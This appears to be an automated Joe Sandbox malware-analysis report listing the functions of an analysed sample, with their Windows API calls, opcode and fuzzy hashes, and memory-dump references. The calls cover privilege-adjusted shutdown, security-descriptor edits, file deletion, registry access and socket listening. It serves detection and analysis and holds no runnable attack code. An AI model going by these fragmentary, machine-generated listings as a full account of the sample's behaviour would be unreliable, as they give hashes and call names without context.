                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_memset
                                                                                                                        • String ID: Q\E$[$\$\$\$]$^
                                                                                                                        • API String ID: 3555123492-286096704
                                                                                                                        • Opcode ID: ba52b6884eb98634ee9956c8913acc47c366e0a92e984512733c95adad312a65
                                                                                                                        • Instruction ID: 43cd67e1b161b4226329bd2822c2735c695bf2e81924d8bbb8a0db955cac5f68
                                                                                                                        • Opcode Fuzzy Hash: ba52b6884eb98634ee9956c8913acc47c366e0a92e984512733c95adad312a65
                                                                                                                        • Instruction Fuzzy Hash: D7729A71E042198BDF28CF98C9807ADB7B1FF44314F2895AAD855BB381E734AE85DB50
                                                                                                                        Function 00E7BDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fc500a15f104ee9c26203eea9f28da3af628145492e7023d42d16990df5bf91f
                                                                                                                        • Instruction ID: 372420ce5df02ce16f0e43f1da7e226310d2293debf080cd7d0ca74481798d59
                                                                                                                        • Opcode Fuzzy Hash: fc500a15f104ee9c26203eea9f28da3af628145492e7023d42d16990df5bf91f
                                                                                                                        • Instruction Fuzzy Hash: 72324A75A022298FDB248F55DD806E9B7F9FB4A314F5890D9E40EE7A81D7309E80CF52
                                                                                                                        Function 00E8B398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                          • Part of subcall function 00E8B8E7: GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
                                                                                                                          • Part of subcall function 00E8B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                          • Part of subcall function 00E8B8E7: HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                          • Part of subcall function 00E8B982: GetProcessHeap.KERNEL32(00000008,00E8B3E1,00000000,00000000,?,00E8B3E1,?), ref: 00E8B98E
                                                                                                                          • Part of subcall function 00E8B982: HeapAlloc.KERNEL32(00000000,?,00E8B3E1,?), ref: 00E8B995
                                                                                                                          • Part of subcall function 00E8B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E8B3E1,?), ref: 00E8B9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E8B3FC
                                                                                                                        • _memset.LIBCMT ref: 00E8B411
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8B430
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B441
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E8B47E
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E8B49A
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B4B7
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E8B4C6
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E8B4CD
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E8B4EE
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00E8B4F5
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8B526
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E8B54C
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8B560
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        • Opcode ID: cfe3f54b4dc66a2b7bb38f28188054999e2abae8e5a5ad86a5e286a7525d46fd
                                                                                                                        • Instruction ID: 1015ef69ad2769ba8c56c310d433b3913426aa2d98aba0188d42afafc71c16a7
                                                                                                                        • Opcode Fuzzy Hash: cfe3f54b4dc66a2b7bb38f28188054999e2abae8e5a5ad86a5e286a7525d46fd
                                                                                                                        • Instruction Fuzzy Hash: 33514D71900209AFDF04EFA5DC45AEEBBBAFF45314F04811AE919B72A1D7319A09CB60
                                                                                                                        Function 00E96E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E531B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00E531DA
                                                                                                                          • Part of subcall function 00E97C0C: GetFileAttributesW.KERNEL32(?,00E96A7B), ref: 00E97C0D
                                                                                                                        • _wcscat.LIBCMT ref: 00E96E7E
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96E99
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00E96EAE
                                                                                                                        • _wcscpy.LIBCMT ref: 00E96EDD
                                                                                                                        • _wcscat.LIBCMT ref: 00E96EEF
                                                                                                                        • _wcscat.LIBCMT ref: 00E96F01
                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00E96F0E
                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E96F22
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00E96F3D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                        • Opcode ID: a506fc5e01d0ba09f9bfd6b6c29bc1558253fff4475c6a9b08d96023f8b43e9d
                                                                                                                        • Instruction ID: 872c7eac0f41fea6b0adab2b85c5dd151a50f2fb60d68bae0dadb412a00f454f
                                                                                                                        • Opcode Fuzzy Hash: a506fc5e01d0ba09f9bfd6b6c29bc1558253fff4475c6a9b08d96023f8b43e9d
                                                                                                                        • Instruction Fuzzy Hash: 5D21BFB2409344AECA11EBA498849DBBBDC9B99314F045A5BF9D8D3052EA30D60D87A2
                                                                                                                        Function 00E55D32 Relevance: 17.1, Strings: 13, Instructions: 810COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                        • API String ID: 0-2893523900
                                                                                                                        • Opcode ID: 5f6463c77b6c05bde832f2f23ca381771a59044b9a02d833adf47bdd7235fba0
                                                                                                                        • Instruction ID: 8d0b8af6875aae54bd06586c90d0cc6dda595c65a8ecd17276ba95db0f8a77c7
                                                                                                                        • Opcode Fuzzy Hash: 5f6463c77b6c05bde832f2f23ca381771a59044b9a02d833adf47bdd7235fba0
                                                                                                                        • Instruction Fuzzy Hash: 45629EB5E002198BDB24CF68C8817AEB7B5EF48310F24956BE845FB381DB709E45DB91
                                                                                                                        Function 00EB30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00EB3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EB317F
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00EB321E
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00EB32B6
                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00EB34F5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EB3502
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1240663315-0
                                                                                                                        • Opcode ID: 48e9c209ad0905f38228b284138ff6c6029f85af22c3b52ce5e3bf44885f83cf
                                                                                                                        • Instruction ID: 8ee55ccaf7c9b21e90d253de440749d2b4041df3d3b16699c3fa109d02a61d81
                                                                                                                        • Opcode Fuzzy Hash: 48e9c209ad0905f38228b284138ff6c6029f85af22c3b52ce5e3bf44885f83cf
                                                                                                                        • Instruction Fuzzy Hash: 68E16B31204210AFCB14DF29CD95D6BBBE9EF89314F04996DF85AEB261DA30ED05CB51
                                                                                                                        Function 00EA7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1737998785-0
                                                                                                                        • Opcode ID: ceaa6b5773302d7cc4b93e190fde395223018de20700e7b533d7ff339cb131b1
                                                                                                                        • Instruction ID: c087d7d0a089404bd667bdb3780973c0756c54b7e47a4308f70b34cd48b47cfd
                                                                                                                        • Opcode Fuzzy Hash: ceaa6b5773302d7cc4b93e190fde395223018de20700e7b533d7ff339cb131b1
                                                                                                                        • Instruction Fuzzy Hash: E921D131249210AFDB10AF65EC09B6E7BE8FF49310F01901AF94ABB261DB31ED059B90
                                                                                                                        Function 00EAC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8A857: CLSIDFromProgID.OLE32 ref: 00E8A874
                                                                                                                          • Part of subcall function 00E8A857: ProgIDFromCLSID.OLE32(?,00000000), ref: 00E8A88F
                                                                                                                          • Part of subcall function 00E8A857: lstrcmpiW.KERNEL32(?,00000000), ref: 00E8A89D
                                                                                                                          • Part of subcall function 00E8A857: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00E8A8AD
                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00EAC6AD
                                                                                                                        • _memset.LIBCMT ref: 00EAC6BA
                                                                                                                        • _memset.LIBCMT ref: 00EAC7D8
                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00EAC804
                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 00EAC80F
                                                                                                                        Strings
                                                                                                                        • NULL Pointer assignment, xrefs: 00EAC85D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                        • API String ID: 1300414916-2785691316
                                                                                                                        • Opcode ID: e73a0aad0cdcfdfde73524eb265897ee865897579e983457374d11ff55d37311
                                                                                                                        • Instruction ID: 7f5071588fbe018cc54eb3fc70b7c0625af8f1cddf6af95bf4e7f6e5ffe8d903
                                                                                                                        • Opcode Fuzzy Hash: e73a0aad0cdcfdfde73524eb265897ee865897579e983457374d11ff55d37311
                                                                                                                        • Instruction Fuzzy Hash: 13914A71D00218ABDB14DFA4DC81EDEBBB9EF09750F20515AF919BB281DB706A45CFA0
                                                                                                                        Function 00EA24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EA24F6
                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EA2526
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA253A
                                                                                                                        • _wcscmp.LIBCMT ref: 00EA2555
                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EA25F3
                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EA2609
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                        • Opcode ID: 07b4fcf2953e587faf4ad1e23749ee7e9e3979f59a2048ab8c67de2b0d5236f0
                                                                                                                        • Instruction ID: 1fae12c8fdebb848fe1c0a2a6d2c27172a9cde143ef74c3f84ae91b87cec2f20
                                                                                                                        • Opcode Fuzzy Hash: 07b4fcf2953e587faf4ad1e23749ee7e9e3979f59a2048ab8c67de2b0d5236f0
                                                                                                                        • Instruction Fuzzy Hash: C141B171D0521AAFCF10DFA8CC59AEEBBB4FF09304F10545AE915BA191E730AA44CF51
                                                                                                                        Function 00E58CA0 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1058COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                                                        • API String ID: 0-1546025612
                                                                                                                        • Opcode ID: 3d8b1920664746076493ba45a3f524e54323432b854906ab94e3de99d1eff29a
                                                                                                                        • Instruction ID: 73fc609ddcda1aa7a928f84476b91556888685634a94ace74d94d7111eb04332
                                                                                                                        • Opcode Fuzzy Hash: 3d8b1920664746076493ba45a3f524e54323432b854906ab94e3de99d1eff29a
                                                                                                                        • Instruction Fuzzy Hash: 8F928B74A0021ACBDF24CF58C9807EDB7B1EB54359F2469AAEC16BB381D7309D86CB51
                                                                                                                        Function 00E58530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 6d2a646fd6472daca48fac03e7ce0f2132fd3b45ecc3717b69c3404b75f7b702
                                                                                                                        • Instruction ID: 7aef24fd5afc6f117b49f667dfc7accf33cbad6875749a5098474222b6616ddf
                                                                                                                        • Opcode Fuzzy Hash: 6d2a646fd6472daca48fac03e7ce0f2132fd3b45ecc3717b69c3404b75f7b702
                                                                                                                        • Instruction Fuzzy Hash: F2126B70A00609DFDF04DFA5DA81AAEB7F5FF48301F206969E846F7250EB36A915CB50
                                                                                                                        Function 00E982D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                          • Part of subcall function 00E8BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                          • Part of subcall function 00E8BEC3: GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00E9830C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                        • Opcode ID: c34ea2451b23bf09fbc1a39500c9792c5eddbac82d2f953414669466bb410e80
                                                                                                                        • Instruction ID: 0e2c2edc68e82ec2e49c8afe5b874c7b08a0d200e1d785707ef21f1e1c280157
                                                                                                                        • Opcode Fuzzy Hash: c34ea2451b23bf09fbc1a39500c9792c5eddbac82d2f953414669466bb410e80
                                                                                                                        • Instruction Fuzzy Hash: 5A01A771694315ABEF68A6789D4AFFB7358DB12F84F142425FD43F51F1DE609C0081A4
                                                                                                                        Function 00EA91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EA9235
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9244
                                                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00EA9260
                                                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00EA926F
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EA9289
                                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00EA929D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279440585-0
                                                                                                                        • Opcode ID: c9cf243418a9ae6aede0861fb789a486106a1eea9757d0419bccdd3fc9a026a6
                                                                                                                        • Instruction ID: 2092af59fbb747a09ff942333ab9d4841d30613e6f2841ccd21209030e9a7f47
                                                                                                                        • Opcode Fuzzy Hash: c9cf243418a9ae6aede0861fb789a486106a1eea9757d0419bccdd3fc9a026a6
                                                                                                                        • Instruction Fuzzy Hash: AA21A235600600AFCB10EF64EC45B6E77F9EF49324F14915AF956BB2A2CB30AD45CB61
                                                                                                                        Function 00E96F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E96F7D
                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E96F8D
                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E96FAC
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E96FD0
                                                                                                                        • _wcscat.LIBCMT ref: 00E96FE3
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E97022
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
